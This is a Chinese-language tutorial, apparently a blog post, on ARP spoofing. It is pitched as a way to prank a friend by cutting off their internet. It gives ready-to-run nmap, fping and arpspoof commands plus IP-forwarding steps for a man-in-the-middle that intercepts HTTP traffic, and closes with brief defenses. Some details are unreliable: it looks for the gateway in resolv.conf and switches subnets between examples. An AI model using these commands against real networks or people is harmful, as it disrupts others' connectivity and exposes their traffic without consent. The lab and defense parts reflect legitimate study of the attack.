断网法术之ARP欺骗

想整蛊你的死党朋友让上不了网，黑魔法ARP攻击满足你

1.1 ARP协议

先了解一下什么是ARP攻击

在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。MAC地址就是ARP协议获得的。其实就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。所以说从某种意义上讲ARP协议是工作在更低于IP协议的协议层。这也是为什么ARP欺骗更能够让人在神不知鬼不觉的情况下出现网络故障，危害会很隐蔽。

2.1 ARP欺骗原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

当局域网中一台机器，反复向其他机器，特别是向网关，发送这样无效假冒的ARP应答信息包时，严重的网络堵塞就会开始。由于网关MAC地址错误，所以从网络中计算机发来的数据无法正常发到网关，自然无法正常上网。这就造成了无法访问外网的问题，由于很多时候网关还控制着我们的局域网LAN上网，所以这时我们的LAN访问也就出现问题了。

3.1 断网攻击

3.1.1 寻找局域网内存活主机

测试信息

攻击机：kali ip：192.168.184.128

靶机：win10 ip：192.168.184.130

nmap扫描

nmap -sP 192.168.184.*

fping探测

fping -g 192.168.184.0/24

3.1.2 查看当前网关

cat etc/resolv.conf

3.1.3 发起攻击

使用arpspoof工具

arpspoof -i 网卡 -t 目标IP 网关

arpspoof -i eth0 -t 192.168.184.130 192.168.184.2

攻击开始后，win10靶机就断网了

ctrl+Z终止攻击

补充一点：

刚方法适用于在同一局域网的目标，如果两台主机同时连接的校园网是大概率不行的，大部分校园网都做了ip隔断，无线用户之间互相隔离

3.2 ARP欺骗（不断网）

ARP欺骗攻击是冒充网关向目标主机发送假的ARP数据包。

攻击流程

1. 获取目标主机的流量
2. 获取流量之后进行转发

相当于一个中间人，可以在中途拦截一下流量，这样所有的流量都会被监控

开启转发功能

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward（转发）
#echo 代表写入
这样可以实现流量转发，而不是截断流量
如果要截断流量，写入0即可
#截断流量
echo 0 >/proc/sys/net/ipv4/ip_forward（断网）

发起攻击

arpspoof -i eth0 -t 192.168.186.2 192.168.186.131

注意这次是网关在前，目标ip在后

结果

经过测试后发现，访问http网站时可以拦截流量，而https则不行

https加密传输，安全性还是挺好的

这里稍微补充一下HTTP和HTTPS

1.HTTP是一种发布和接收HTML页面的方法，被用于在Wb浏览器和网站服务器之间传递信息。
2.HTTP协议以明文方式发送内容，不提供任何方式的数据加密，如果攻击者截取了Wb浏览器和
网站服务器之间的传输报文，就可以直接读懂其中的信息。
3.HTTPS经由HTTP进行通信，但利用SSL/TLS来加密数据包。HTTPS开发的主要目的，是提
供对网站服务器的身份认证，保护交换数据的隐私与完整性。
4.HTTPS(SSL+HTTP)数据传输过程是加密的，安全性较好。

4.1 如何防御ARP欺骗

ARP 高速缓存超时设置
在ARP高速缓存中的表项一般都要设置超时值，缩短这个这个超时值能够有用的避免ARP表的溢出。

静态ARP缓存表
每台主机都有一个暂时寄存IP-MAC的对应表ARP攻击就经过更改这个缓存来到达诈骗的意图，运用静态的ARP来绑定正确的MAC是一个有用的办法，在命令行下运用arp -a能够检查当时的ARP缓存表。

自动查询
在某个正常的时间，做一个IP和MAC对应的数据库，以后定时检查当时的IP和MAC对应联系是否正常，定时检查交流机的流量列表，检查丢包率。